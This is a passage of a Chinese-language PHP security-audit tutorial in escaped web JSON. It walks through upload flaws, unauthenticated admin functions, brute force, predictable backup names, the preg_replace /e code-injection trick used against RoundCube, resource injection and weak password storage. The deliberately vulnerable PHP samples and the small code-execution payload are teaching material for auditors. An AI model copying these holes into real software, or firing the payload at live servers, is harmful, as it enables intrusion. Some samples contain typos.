&#8220;Valid upload receivedn&#8221;;<\/p>\n<p>} else {<\/p>\n<p>echo &#8220;Invalid upload rejectedn&#8221;;<\/p>\n<p>} ?&gt;<\/p>\n<p>\u5373\u4f7f\u7a0b\u5e8f\u5c06\u6587\u4ef6\u5b58\u50a8\u5728\u4e00\u4e2a\u4e0d\u53ef\u901a\u8fc7WEB\u8bbf\u95ee\u7684\u76ee\u5f55\u4e0b\uff0c\u653b\u51fb\u8005\u4f9d\u7136\u53ef\u4ee5\u5c06\u6076\u610f\u5185\u5bb9\u6ce8\u5165\u5230\u670d\u52a1\u7aef\u73af\u5883\u4e2d\u4ee5\u53d1\u52a8\u5176\u5b83\u653b\u51fb\u3002\u5982\u679c\u7a0b\u5e8f\u6613\u906d\u53d7\u5230\u8def\u5f84\u64cd\u4f5c\uff0c\u547d\u4ee4\u6ce8\u5165\u6216\u8005\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u7b49\u7684\u5f71\u54cd\uff0c\u90a3\u4e48\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4e0a\u4f20\u4e00\u4e2a\u5305\u542b\u6076\u610f\u5185\u5bb9\u7684\u6587\u4ef6\uff0c\u4ee5\u4f7f\u7a0b\u5e8f\u901a\u8fc7\u53ef\u5229\u7528\u7684\u6f0f\u6d1e\u53bb\u8bfb\u53d6\u6216\u6267\u884c\u5b83\u3002<\/p>\n<h6><strong>\u653b\u51fb<\/strong><strong> (<\/strong><strong>\u53d1\u9001\u6587\u4ef6<\/strong><strong>):<\/strong><\/h6>\n<p>&lt;html&gt;<\/p>\n<p>&lt;body&gt; &lt;form enctype=&#8221;multipart\/form-data&#8221;method=POST&gt;<\/p>\n<p>&lt;input type=file name=&#8221;userfile&#8221;&gt;<\/p>\n<p>&lt;input type=&#8221;submit&#8221;&gt;<\/p>\n<p>&lt;\/form&gt;<\/p>\n<p>&lt;\/body&gt;<\/p>\n<p>&lt;\/html&gt;<\/p>\n<h6><strong>\u9632\u5fa1\uff1a<\/strong><\/h6>\n<p>\u5982\u679c\u7528\u6237\u5e76\u4e0d\u9700\u8981\u4e0a\u4f20\u6587\u4ef6\uff0c\u90a3\u4e48\u5c31\u5173\u95ed\u5b83\u3002<\/p>\n<p>PHP.ini:<\/p>\n<p><em>file_uploads = off<\/em><\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b<\/strong><strong>:<\/strong><\/h6>\n<p>http:\/\/www.milw0rm.com\/exploits\/2937<\/p>\n<p>http:\/\/securityvulns.com\/Tdocument590.html<\/p>\n<h6><strong>13 \u2013 <\/strong><strong>\u51fd\u6570<\/strong><strong>\/<\/strong><strong>\u6587\u4ef6\u7684\u672a\u8ba4\u8bc1\u8c03\u7528<\/strong><strong>(Medium):<\/strong><\/h6>\n<p>\u4e00\u4e9b\u7ba1\u7406\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\u539f\u672c\u662f\u7981\u6b62\u8bbf\u95ee\u7684\uff0c\u4f46\u7531\u4e8e\u7a0b\u5e8f\u5458\u5fd8\u8bb0\u5bf9\u8fd9\u4e9b\u6587\u4ef6\u8fdb\u884c\u9a8c\u8bc1\uff0c\u4ee5\u81f4\u6f0f\u6d1e\u7684\u53d1\u751f\u3002\u653b\u51fb\u8005\u5fc5\u987b\u5bf9\u5b58\u5728\u6b64\u95ee\u9898\u7684\u6587\u4ef6\u8fdb\u884c\u68c0\u6d4b\u3002\u5f53PHP\u7a0b\u5e8f\u5728\u672a\u7ecf\u8bb8\u53ef\u7684\u60c5\u51b5\u4e0b\u8c03\u7528\u7ba1\u7406\u51fd\u6570\u65f6\uff0c\u653b\u51fb\u8005\u53ef\u8c03\u7528\u8fd9\u4e9b\u51fd\u6570\uff1a<\/p>\n<h6>#index.php<\/h6>\n<p>&lt;?php<\/p>\n<p>include (&#8220;Function.php&#8221;);<\/p>\n<p>$action=$_GET[&#8216;action&#8217;];<\/p>\n<p>if ($action == $actionArray[$action][0])) {<\/p>\n<p>#load proper Function with $_GET<\/p>\n<p>&#8230;<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<h6>#Function.php<\/h6>\n<p>&lt;?php<\/p>\n<p>$actionArray = array(<\/p>\n<p>&#8216;activate&#8217; =&gt; array(&#8216;Register, &#8216;Activate&#8217;),<\/p>\n<p>&#8216;admin&#8217; =&gt; array(&#8216;Admin&#8217;, &#8216;Admin&#8217;),<\/p>\n<p>&#8216;upload&#8217;=&gt; array(&#8216;Post&#8217;, &#8216;upload&#8217;),<\/p>\n<p>&#8216;ban&#8217; =&gt; array(&#8216;ManageBans&#8217;, &#8216;Ban),<\/p>\n<p>);<\/p>\n<p>function Forum (){<\/p>\n<p>#Authorize Function<\/p>\n<p>&#8230;<\/p>\n<p>}<\/p>\n<p>Function upload (){<\/p>\n<p># admin function without Permission<\/p>\n<p>&#8230;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>\u672c\u4f8b\u4e2d\u653b\u51fb\u8005\u53ef\u5728\u672a\u7ecf\u8bb8\u53ef\u7684\u60c5\u51b5\u4e0b\u52a0\u8f7d\u7ba1\u7406\u51fd\u6570\uff1a<\/p>\n<p><em># index.php?action=upload<\/em><\/p>\n<h6><strong>14 \u2013 <\/strong><strong>\u901a\u8fc7<\/strong><strong>\u66b4\u529b\u7834\u89e3\u7ed5\u8fc7\u767b\u9646\u9a8c\u8bc1<\/strong><strong> (Low):<\/strong><\/h6>\n<p>\u5f53\u7a0b\u5e8f\u5458\u672a\u5bf9\u5c1d\u8bd5\u767b\u9646\u5931\u8d25\u7684\u6b21\u6570\u8fdb\u884c\u68c0\u6d4b\u65f6\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u4e00\u4e9b\u767b\u9646\u9875\u9762\u4e0a\u901a\u8fc7\u66b4\u529b\u7834\u89e3\u7ed5\u8fc7\u9a8c\u8bc1\u3002<\/p>\n<p>\u6ce8\u610f\uff1a\u5f53\u4e00\u4e2a\u61d2\u60f0\u7684\u7a0b\u5e8f\u5458\u4f7f\u7528basic authentication\u6765\u4fdd\u62a4\u4ed6\/\u5979\u7684\u63a7\u5236\u9762\u677f\u65f6\uff0c\u8fd9\u5c06\u7ed9\u653b\u51fb\u8005\u63d0\u4f9b\u4e00\u6b21\u66b4\u529b\u7834\u89e3\u7684\u673a\u4f1a\u3002<\/p>\n<p>&lt;?php<\/p>\n<p>if (!isset<strong>(<\/strong><strong>$_SERVER<\/strong><strong>[<\/strong><strong>&#8216;PHP_AUTH_USER&#8217;<\/strong><strong>])) <\/strong>{<\/p>\n<p>header(&#8216;WWW-Authenticate: Basic realm=&#8221;My Realm&#8221;&#8216;);<\/p>\n<p>header(&#8216;HTTP\/1.0 401 Unauthorized&#8217;);<\/p>\n<p>echo &#8216;Text to send if user hits Cancel button&#8217;;<\/p>\n<p>exit;<\/p>\n<p>} else {<\/p>\n<p>echo &#8220;&lt;p&gt;Hello {$_SERVER[&#8216;PHP_AUTH_USER&#8217;]}.&lt;\/p&gt;&#8221;;<\/p>\n<p>echo &#8220;&lt;p&gt;You entered {$_SERVER[&#8216;PHP_AUTH_PW&#8217;]} as your password.&lt;\/p&gt;&#8221;;<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b<\/strong><strong>:<\/strong><\/h6>\n<p>\u5927\u90e8\u5206\u7684\u5546\u4e1a\u7ba1\u7406\u7cfb\u7edf\uff08CMS\uff09,\u4f8b\u5982\uff1aOS-commerce (\u5728\u67d0\u4e9b\u7248\u672c\u4e2d)\u3002<\/p>\n<h6><strong>15 \u2013<\/strong><strong>\u4e0d\u5b89\u5168\u7684\u968f\u673a\u547d\u540d<\/strong><strong>Session \/ Cookie \/ <\/strong><strong>\u5907\u4efd\u6587\u4ef6<\/strong><strong>(Medium)<\/strong><strong>:<\/strong><\/h6>\n<p>\u5728\u547d\u540dsession &amp; cookie &amp;\u5907\u4efd\u6587\u4ef6\u65f6\uff0c\u5c06\u5176\u968f\u673a\u5316\uff0c\u53ef\u80fd\u4f1a\u51fa\u5356\u5b83\u4eec\u3002<\/p>\n<p>\u4f8b\u5982\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$rnd = rand(1,100);<\/p>\n<p>$fp = fopen($rnd.&#8217;_backup_.sql&#8217;, &#8216;w&#8217;);<\/p>\n<p>fwrite($fp, $db );<\/p>\n<p>fclose($fp);<\/p>\n<p>?&gt;<\/p>\n<p>\u672c\u4f8b\u4e2d\uff1a\u5c06\u5907\u4efd\u6587\u4ef6\u5199\u5165\u5230&#8221;$rand_backup_.sql&#8221;\u4e2d\u3002\u5728\u4ee3\u7801\u7b2c2\u884c\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230$rand\u53c2\u6570\uff0c\u5b83\u968f\u673a\u751f\u62101-100\u4e4b\u95f4\u7684\u4efb\u610f\u6570\u3002\u653b\u51fb\u8005\u53ef\u5199\u5165\u4ee3\u7801\u4ee5\u66b4\u529b\u7834\u89e3\u6587\u4ef6\u540d\u3002\u56e0\u6b64\u5f53\u6211\u4eec\u5728\u751f\u6210Session &amp; Cookie\u7684\u65f6\u5019\uff0c\u5e94\u5f53\u8c28\u614e\u5730\u4f7f\u7528\u968f\u673a\u51fd\u6570\u3002<\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b<\/strong><strong>:<\/strong><\/h6>\n<p><em>PHP-Fusion &lt;= 6.00.105 Accessible Database Backups Download Exploit:<\/em><\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/1068<\/p>\n<h6><strong>16 \u2013<\/strong><strong> HTML Comment<\/strong><strong>\u4e2d\u63d0\u4f9b\u7684\u8be6\u7ec6\u4fe1\u606f<\/strong><strong> (Low):<\/strong><\/h6>\n<p>HTML\u6807\u7b7e\u53ef\u7528\u4e8e\u5bfb\u8e2aWEB\u7a0b\u5e8f\u6216\u8005\u6cc4\u6f0fWEB\u7a0b\u5e8f\u7ed3\u6784\u3002<\/p>\n<h6><strong>17 \u2013 <\/strong><strong>\u9ed8\u8ba4\u5b89\u88c5\u7684\u591a\u4f59\u6587\u4ef6<\/strong><strong> (medium):<\/strong><\/h6>\n<p>\u4e00\u4e9bPHP CMS\u6216\u8005WEB\u7a0b\u5e8f\u5728\u5b89\u88c5\u5b8c\u6210\u540e\u5e76\u6ca1\u6709\u5220\u9664\u5b89\u88c5\u6587\u4ef6\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u63a7\u5236\u5176\u4e2d\u7684\u6570\u636e\u6216\u8005\u91cd\u8bbe\u7ba1\u7406\u5458\u5bc6\u7801\u3002<\/p>\n<h6><strong>18 \u2013 <\/strong><strong>\u6b63\u5219\u8868\u8fbe\u5f0f\uff08<\/strong><strong>Regular Expression<\/strong><strong>\uff09\u6f0f\u6d1e<\/strong><strong>(High):<\/strong><\/h6>\n<p>Regular Expression Injection\u6216\u8005RegEx Injection\u901a\u8fc7\u66ff\u6362\u6b63\u5219\u8868\u8fbe\u5f0f\u4e2d\u7684\u4fee\u9970\u7b26e\u800c\u5c06\u4ee3\u7801\u6ce8\u5165\u5230WEB\u7a0b\u5e8f\u4e2d\u3002Perl\u652f\u6301\u8fd9\u4e2a\u4fee\u9970\u7b26\uff0c\u5176\u5b83\u6280\u672f\u5305\u62ecPCRE(Perl-compatible regular expressions) library\u3002\u5982\u679c\u8be5\u6f0f\u6d1e\u88ab\u4f7f\u7528\uff0c\u5176\u66ff\u6362\u5185\u5bb9\u662f\u53ef\u4f30\u8ba1\u7684\u3002\u8fd9\u79cd\u65b9\u6cd5\u5f88\u5f3a\u5927\uff0c\u56e0\u4e3a\u5b83\u4e0d\u4ec5\u5141\u8bb8\u4f7f\u7528\u53d8\u91cf\u540d\uff0c\u800c\u4e14\u652f\u6301\u5176\u5b83\u547d\u4ee4\u3002<\/p>\n<p><strong>Example (<em>RoundCube Bug)<\/em>:<\/strong><\/p>\n<p>RoundCube\u4f7f\u7528\u4e86html2text\u51fd\u6570\uff0c\u5b83\u5b58\u5728\u4e00\u4e2a\u8bc4\u8bba\u6f0f\u6d1e\uff1a\u7528\u6237\u8f93\u5165\u7684\u6570\u636e\u53ef\u88abPHP\u5f15\u64ce\u5206\u6790\u5e76\u6267\u884c\u3002\u8fd9\u5c06\u5bfc\u81f4\u4e00\u4e9b\u88ab\u6076\u610f\u6784\u9020\u7684\u8f93\u5165\u6570\u636e\u88abWEB\u670d\u52a1\u5668\u5f53\u4f5cPHP\u4ee3\u7801\u6765\u6267\u884c\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u7531\u4e8ePHP\u4e2d\u4f7f\u7528\u7684preg_replace()\u51fd\u6570\u7528\u4e86&#8217;e&#8217; flag\u800c\u5bfc\u81f4\u7684\u3002\u5728\u6b63\u5219\u8868\u8fbe\u5f0f\u4e2d\u4f7f\u7528\u2019e\u2019\u5c06\u5141\u8bb8PHP\u5bf9\u8f93\u5165\u6570\u636e\u8fdb\u884c\u5904\u7406\u3002\u4f8b\u5982\u6211\u4eec\u60f3\u5c06\u5c0f\u5199\u5b57\u7b26\u4e32\u66f4\u6539\u4e3a\u5927\u5199\u7684\uff0c\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u4ee3\u7801\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>print preg_replace(&#8216;\/(.*)\/e&#8217;, &#8216;strtoupper(&#8220;\\1&#8221;)&#8217;, &#8216;test&#8217;);<\/p>\n<p>?&gt;<\/p>\n<p>preg_replace\u51fd\u6570\u5141\u8bb8\u7a0b\u5e8f\u5458\u4f7f\u7528PHP\u4e2d\u7684strtoupper ()\u51fd\u6570\u53bb\u5904\u7406\u8f93\u5165\u7684\u5b57\u7b26\u4e32\uff0c\u8fd9\u5c06\u5bfc\u81f4\u7528\u6237\u53ef\u4ee5\u8f93\u5165\u5305\u542bPHP\u547d\u4ee4\u7684\u5b57\u7b26\u4e32\uff0c\u4ee5\u81f4\u9020\u6210\u4e0d\u826f\u540e\u679c\u3002<\/p>\n<p>\u5229\u7528\u8be5\u6f0f\u6d1e\u6700\u7edd\u7684\u4e00\u62db\u5c31\u662f\u5c06PHP\u547d\u4ee4\u4f2a\u88c5\u6210\u53d8\u91cf\u6765\u6267\u884c\u5b83\u4eec\u3002\u5728\u6b63\u5e38\u7684\u64cd\u4f5c\u4e2d\uff0cpreg_replace\u5141\u8bb8\u7528\u6237\u5728\u53d8\u91cf\u4e2d\u4f20\u8f93\u5e76\u66ff\u6362\u5b83\u4eec\u3002\u4f8b\u5982\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$foo = &#8216;bar&#8217;;<\/p>\n<p>print preg_replace(&#8216;\/(.*)\/e&#8217;, &#8216;strtoupper(&#8220;\\1&#8221;)&#8217;, &#8216;$foo&#8217;);<\/p>\n<p>?&gt;<\/p>\n<p>\u5c06\u8f93\u51fa\u9884\u6599\u4e2d\u7684\u201cBAR\u201d\u3002\u4f46\u5f53\u4f7f\u7528\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$foo = &#8216;bar&#8217;;<\/p>\n<p>print preg_replace(&#8216;\/(.*)\/e&#8217;, &#8216;strtoupper(&#8220;\\1&#8221;)&#8217;, &#8216;phpinfo()&#8217;);<\/p>\n<p>?&gt;<\/p>\n<p>\u5c06\u4f1a\u7b80\u5355\u5730\u8f93\u51fa&#8221;PHPINFO()&#8221;\u3002\u4e3a\u4e86\u4f7fPHP\u5f15\u64ce\u53bb\u89e3\u91ca\u547d\u4ee4\uff0c\u6211\u4eec\u5fc5\u987b\u5c06\u5176\u5206\u914d\u7ed9\u4e00\u4e2a\u53d8\u91cf\u3002\u901a\u5e38\u53ef\u4ee5\u7b80\u5355\u5730\u4f7f\u7528\u4e00\u4e2a&#8217;$&#8217;\u4f5c\u4e3a\u5206\u9694\u7b26\uff0c\u5e76\u7528\u4e0aPHP\u5927\u62ec\u53f7\uff0c\u4e8e\u662f\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>print ${phpinfo()};<\/p>\n<p>?&gt;<\/p>\n<p>\u5c06\u5c3d\u804c\u5730\u8f93\u51faphpinfo()\u547d\u4ee4\u7684\u8f93\u51fa\u7ed3\u679c\u3002\u4f46\u5982\u679c\u6211\u4eec\u5c06\u5176\u53d1\u9001\u7ed9\u539f\u5148\u7684preg_replace()\u51fd\u6570\uff0c\u90a3\u4e48\u5c06\u4f1a\u53d1\u751f\u9519\u8bef\uff0c\u4f60\u4f1a\u6ce8\u610f\u5230\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>print preg_replace(&#8216;\/(.*)\/e&#8217;, &#8216;strtoupper(&#8220;\\1&#8221;)&#8217;, &#8216;${phpinfo()}&#8217;);<\/p>\n<p>?&gt;<\/p>\n<p>\u4ea7\u751f\u4e86\u4e0b\u5217\u9519\u8bef\uff1a<\/p>\n<p><em>[Tue Jan 13 09:24:48 2009] [error] [client 192.168.0.50] PHP Fatal error: preg_replace() [&lt;a<\/em><\/p>\n<p><em>href=&#8217;function.preg-replace&#8217;&gt;function.preg-replace&lt;\/a&gt;]: Failed evaluating code:<\/em><\/p>\n<p><em>nstrtoupper(&#8220;${phpinfo()}&#8221;) in \/var\/www\/html\/exploit.php on line 22<\/em><\/p>\n<p>\u4e3a\u4e86\u907f\u514d\u53d1\u751f\u9519\u8bef\uff0c\u6211\u4eec\u9700\u8981\u518d\u6dfb\u52a0\u4e00\u4e2a\u5927\u62ec\u53f7\uff0c\u4ee5\u6267\u884c\u8d4b\u4e88\u7684\u547d\u4ee4\u3002\u66f4\u6539\u540e\u7684\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>print preg_replace(&#8216;\/(.*)\/e&#8217;, &#8216;strtoupper(&#8220;\\1&#8221;)&#8217;, &#8216;{${phpinfo()}}&#8217;);<\/p>\n<p>?&gt;<\/p>\n<p>RoundCube\u6f0f\u6d1e\u51fa\u73b0\u5728bin\/html2text.sh\u4e2d\u7684\u884c6\u4e2d\uff1a<\/p>\n<p><em>$converter = new html2text(html_entity_decode($HTTP_RAW_POST_DATA, ENT_COMPAT, &#8216;UTF-8&#8217;));<\/em><\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b<\/strong><strong>:<\/strong><\/h6>\n<p><em>Analysis of the RoundCube html2text Vulnerability<\/em><\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/7549<\/p>\n<p>http:\/\/www.securiteam.com\/exploits\/6W00L0KC0I.html<\/p>\n<h6>\u66f4\u591a\u4fe1\u606f\uff1a<\/h6>\n<p>http:\/\/hauser-wenz.de\/playground\/papers\/<strong>RegEx<\/strong>Injection.pdf<\/p>\n<h6><strong>19 \u2013 <\/strong><strong>Resource Injection (Medium):<\/strong><\/h6>\n<p>\u5f53\u9047\u5230\u4e0b\u9762\u4e24\u79cd\u60c5\u51b5\u65f6\u8d44\u6e90\u6ce8\u5165\u6f0f\u6d1e\u5c31\u53d1\u751f\u4e86:<\/p>\n<p>1. \u653b\u51fb\u8005\u53ef\u4ee5\u6307\u5b9a\u6807\u8bc6\u7b26\u53bb\u8bbf\u95ee\u7cfb\u7edf\u8d44\u6e90\u3002<\/p>\n<p>\u4f8b\u5982\u653b\u51fb\u8005\u53ef\u4ee5\u6307\u5b9a\u4e00\u4e2a\u7aef\u53e3\u53f7\u53bb\u8fde\u63a5\u7f51\u7edc\u8d44\u6e90\u3002<\/p>\n<p>2. \u901a\u8fc7\u6307\u5b9a\u8d44\u6e90\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u83b7\u5f97\u539f\u672c\u5e76\u672a\u8bb8\u53ef\u7684\u6743\u9650\u3002<\/p>\n<p>\u4f8b\u5982\u7a0b\u5e8f\u53ef\u80fd\u4f1a\u5141\u8bb8\u653b\u51fb\u8005\u53d1\u9001\u654f\u611f\u4fe1\u606f\u7ed9\u7b2c\u4e09\u65b9\u670d\u52a1\u7aef\u3002<\/p>\n<p>\u4e0b\u9762\u770b\u4e00\u770b\u5173\u4e8e\u6b64\u6f0f\u6d1e\u66f4\u4e3a\u8be6\u7ec6\u7684\u8def\u5f84\u64cd\u4f5c\u63cf\u8ff0\u3002<\/p>\n<p><strong>Example:<\/strong>\u4e0b\u5217\u4ee3\u7801\u4e2d\u8bfb\u53d6\u4e86HTTP request\u4e2d\u7684hostname\uff0c\u5e76\u4f7f\u7528\u5b83\u53bb\u8fde\u63a5\u51b3\u5b9a\u7968\u4ef7\u7684\u6570\u636e\u5e93\u3002<\/p>\n<p>&lt;?php<\/p>\n<p>$host=$_GET[&#8216;host&#8217;];<\/p>\n<p>$dbconn = pg_connect(&#8220;host=$host port=1234 dbname=ticketdb&#8221;);<\/p>\n<p>&#8230;<\/p>\n<p>$result = pg_prepare($dbconn, &#8220;my_query&#8221;, &#8216;SELECT * FROM pricelist WHER<\/p>\n<p>E name = $1&#8217;);<\/p>\n<p>$result = pg_execute($dbconn, &#8220;my_query&#8221;, array(&#8220;ticket&#8221;));<\/p>\n<p>?&gt;<\/p>\n<p>\u8fd9\u7c7b\u53ef\u88ab\u7528\u6237\u7684\u8f93\u5165\u6570\u636e\u5f71\u54cd\u5230\u7684\u8d44\u6e90\u610f\u5473\u7740\u8fd9\u7c7b\u5185\u5bb9\u5b58\u5728\u5371\u9669\u3002\u4f8b\u5982\uff0c\u6570\u636e\u4e2d\u5305\u542b\u7279\u5b9a\u7684\u5b57\u7b26\uff0c\u6bd4\u5982\u53e5\u53f7\uff0c\u659c\u6746\uff0c\u53cd\u659c\u6746\uff0c\u5f53\u4f7f\u7528\u8fd9\u79cd\u53ef\u5371\u5bb3\u5230\u6587\u4ef6\u7cfb\u7edf\u7684\u65b9\u5f0f\u65f6\u90fd\u662f\u5b58\u5728\u98ce\u9669\u7684\u3002\u540c\u65f6\uff0c\u5305\u542bURL\u548cURI\u7684\u6570\u636e\u5bf9\u4e8e\u521b\u5efa\u8fdc\u7a0b\u8fde\u63a5\u4e5f\u662f\u5b58\u5728\u98ce\u9669\u7684\u3002<\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b<\/strong><strong>:<\/strong><\/h6>\n<p>Synthetic Attack [XSS , RI ] :<\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/7866<\/p>\n<p>&nbsp;<\/p>\n<h6><strong>20 \u2013 <\/strong><strong>\u5f31\u53e3\u4ee4<\/strong><strong>: (Low)<\/strong><\/h6>\n<p>\u4f60\u5fc5\u987b\u68c0\u67e5\u4e00\u4e0b\uff1a<\/p>\n<p>&#8211; \u4f60\u5728\u6570\u636e\u5e93\u4e2d\u4f7f\u7528\u672a\u52a0\u5bc6\u7684\u660e\u7801\u3002<\/p>\n<p>&#8211; \u52a0\u5bc6\u5bc6\u7801\uff08\u4f8b\u5982\uff1aMD5\uff09\uff0c\u4f46\u8fd8\u4e0d\u591f\u5b89\u5168\u3002<\/p>\n<p>&#8211; \u4fdd\u5b58\u5bc6\u7801\u5728[.txt, .ini, .xml&#8230;]\u7b49\u6587\u4ef6\u4e2d\uff0c\u8fd9\u4e9b\u6587\u4ef6\u90fd\u6709\u53ef\u80fd\u88ab\u653b\u51fb\u8005\u8bfb\u53d6\u5230\u3002<\/p>\n<p>&#8211; \u4f7f\u7528\u5f31\u53e3\u4ee4\u3002<\/p>\n<p>\u4f8b\u5982<em>password.xml<\/em>\uff08\u53ef\u88ab\u653b\u51fb\u8005\u8bfb\u53d6\uff09<\/p>\n<h6>\u653b\u51fb:<\/h6>\n<p><a href=\"http:\/\/viktim.com\/password.xml\">Http:\/\/viktim.com\/password.xml<\/a><\/p>\n<p>&lt;?xml version=&#8221;1.0&#8243; ?&gt;<\/p>\n<p>&lt;novo-xml&gt;<\/p>\n<p>&lt;register&gt;<\/p>\n<p>&lt;client-id&gt;test&lt;\/client-id&gt;<\/p>\n<p>&lt;password&gt;&#8217;.$username.'&lt;\/password&gt;<\/p>\n<p>&lt;user-id&gt;&#8217;.$password.'&lt;\/user-id&gt;<\/p>\n<p>&lt;phone-num&gt;&#8217;.$phone.'&lt;\/phone-num&gt;<\/p>\n<p>&lt;app-id&gt;test&lt;\/app-id&gt;<\/p>\n<p>&lt;channel&gt;I&lt;\/channel&gt;<\/p>\n<p>&lt;user-type&gt;upgrade&lt;\/user-type&gt;<\/p>\n<p>&lt;\/register&gt;<\/p>\n<p>&lt;\/novo-xml&gt;<\/p>\n<p>&nbsp;<\/p>\n<p>\u901a\u8fc7 <em>password.xml<\/em>\u8fdb\u884c\u8ba4\u8bc1\uff1a<\/p>\n<p><em>Login.php<\/em><\/p>\n<p>&lt;form method=&#8221;post&#8221; action=&#8221;login.php&#8221;&gt;<\/p>\n<p>Username: &lt;input type=&#8221;text&#8221; name=&#8221;username&#8221;&gt;<\/p>\n<p>&lt;br \/&gt;<\/p>\n<p>Password: &lt;input type=&#8221;password&#8221; name=&#8221;password&#8221;&gt;<\/p>\n<p>&lt;br \/&gt;<\/p>\n<p>&lt;input type=&#8221;submit&#8221; name=&#8221;submit&#8221; value=&#8221;Login&#8221;&gt;<\/p>\n<p>&lt;\/form&gt;<\/p>\n<p>&lt;?php<\/p>\n<p>$file = &#8220;password.xml&#8221;;<\/p>\n<p>$username = $_POST[\u2018username\u2019];<\/p>\n<p>$password = $_POST[\u2018password\u2019];<\/p>\n<p>if (file_exists($file))<\/p>\n<p>{<\/p>\n<p>$xml = simplexml_load_file($file);<\/p>\n<p>$count = 0;<\/p>\n<p>foreach($xml-&gt;username as $currUser)<\/p>\n<p>{<\/p>\n<p>if (strtolower($currUser) == strtolower($username))<\/p>\n<p>{<\/p>\n<p>break;<\/p>\n<p>}<\/p>\n<p>$count++;<\/p>\n<p>}<\/p>\n<p>if ($xml-&gt;active[$count] == 1)<\/p>\n<p>{<\/p>\n<p>if (md5($password) == $xml-&gt;password[$count])<\/p>\n<p>{<\/p>\n<p>echo &#8220;Valid user logged in!&#8221;;<\/p>\n<p>}else{<\/p>\n<p>echo &#8220;Password does not match. Come on! Try harder!&#8221;;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>else{<\/p>\n<p>echo &#8220;User is inactive. Choose another!&#8221;;<\/p>\n<p>}<\/p>\n<p>}else{<\/p>\n<p>echo &#8220;Critical Error: File not found!&#8221;;<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b<\/strong><strong>:<\/strong><\/h6>\n<p>Passwords Decrypted for UPB &lt;= 1.9.6:<\/p>\n<p>http:\/\/www.securityfocus.com\/bid\/13975\/exploit<\/p>\n<p>&nbsp;<\/p>\n<h6><strong>Section 2: PHP<\/strong><strong>\u6e90\u7801\u5ba1\u8ba1\u81ea\u52a8\u5316<\/strong><strong>( PHP Fuzzer )<\/strong><\/h6>\n<p>1- <strong>Codescan PHP[$]:<\/strong><\/p>\n<p>http:\/\/www.codescan.com\/<\/p>\n<p>2- <strong>Rats [free] <\/strong>:<\/p>\n<p>http:\/\/www.fortify.com\/security-resources\/rats.jsp<\/p>\n<p><strong>3- Pixy [sqli \u2013 xss] :<\/strong><\/p>\n<p><strong>http:\/\/pixybox.seclab.tuwien.ac.at\/<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h6><strong>\u95ee\u9898\uff1a<\/strong><\/h6>\n<p>\u672c\u6587\u5e76\u672a\u5b8c\u5168\u6d89\u53caPHP\u6e90\u7801\u5b89\u5168\u68c0\u9605\uff08\u5ba1\u8ba1\uff09\uff0c\u7531\u4e8e\u65f6\u95f4\u4ed3\u4fc3\uff0c\u56e0\u6b64\u5bf9\u4e8e\u6587\u4e2d\u6240\u9020\u6210\u7684\u9519\u8bef\u8868\u793a\u62b1\u6b49\u3002\u7b14\u8005\u65e0\u6cd5\u4fdd\u8bc1\uff0c\u4f46\u6709\u53ef\u80fd\u4f1a\u53d1\u5e03\u672c\u6587\u7684\u4e0b\u4e00\u7248\u672c\uff0c\u4ee5\u5305\u542b\u66f4\u591a\u9ad8\u7ea7\u7684\u65b9\u6cd5\u3002<\/p>\n<h6>\u4e0b\u9762\u662f\u4e00\u4e9b\u53ef\u80fd\u5728\u4e0b\u4e00\u7248\u672c\u4e2d\u4f1a\u88ab\u8ba8\u8bba\u5230\u7684\u5185\u5bb9\uff1a<\/h6>\n<ol>\n<ol>\n<li>\u66f4\u591a\u7684\u653b\u51fb\u5b9e\u4f8b<\/li>\n<li>PHPIDS\u9632\u5fa1<\/li>\n<li>\u66f4\u4e3a\u5371\u9669\u7684\u51fd\u6570\uff1aCURL\u00a0&#8211;\u00a0socket\u00a0&#8211;\u00a0creat_function &amp; \u2026<\/li>\n<li>\u8ba8\u8bba\u4e00\u4e9b\u51fd\u6570\u7684\u5b89\u5168\u4f7f\u7528<\/li>\n<li>\u5173\u4e8ePHP\u5b89\u5168\u7f16\u7a0b\u4e66\u7c4d\u7684\u76f8\u5173\u4fe1\u606f<\/li>\n<li>ETC<\/li>\n<\/ol>\n<\/ol>\n<h6><strong>\u8d44\u6e90\uff1a<\/strong><\/h6>\n<ul>\n<li>http:\/\/www.fortify.com<\/li>\n<li>http:\/\/wikipedia.com<\/li>\n<li>http:\/\/www.madirish.net<\/li>\n<li>http:\/\/www.owasp.org<\/li>\n<li>http:\/\/samate.nist.gov\/<\/li>\n<li>http:\/\/searchsecuritychannel.techtarget.com\/<\/li>\n<li>http:\/\/www.webappsec.org<\/li>\n<li>http:\/\/phpsec.org<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>PHP Fuzzing\u884c\u52a8\u2014\u2014\u6e90\u7801\u5ba1\u8ba1 